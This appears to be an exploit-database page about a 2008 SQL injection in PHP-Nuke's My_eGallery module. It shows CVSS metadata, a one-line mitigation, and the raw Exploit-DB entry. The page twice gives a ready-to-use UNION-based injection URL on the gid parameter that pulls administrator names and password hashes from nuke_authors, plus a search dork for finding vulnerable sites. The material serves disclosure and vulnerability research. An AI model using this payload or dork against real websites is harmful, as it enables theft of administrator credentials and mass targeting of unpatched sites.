header-logo
Suggest Exploit
vendor:
My_eGallery
by:
The-0utl4w
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: My_eGallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Nuke My_eGallery “gid” Remote SQL Injection

A vulnerability in the My_eGallery module of PHP-Nuke allows remote attackers to inject arbitrary SQL commands via the gid parameter in a modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* request.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Shoutz: Aura, Null, imm02tal, Kinglet, and our staff
PHP-Nuke My_eGallery "gid" Remote SQL Injection
Dork: inurl:"modules.php?name=My_eGallery"

modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

The-0utl4w 
>From Aria-Security.Net


Original Link: http://forum.aria-security.net/showthread.php?p=1490

# milw0rm.com [2008-02-28]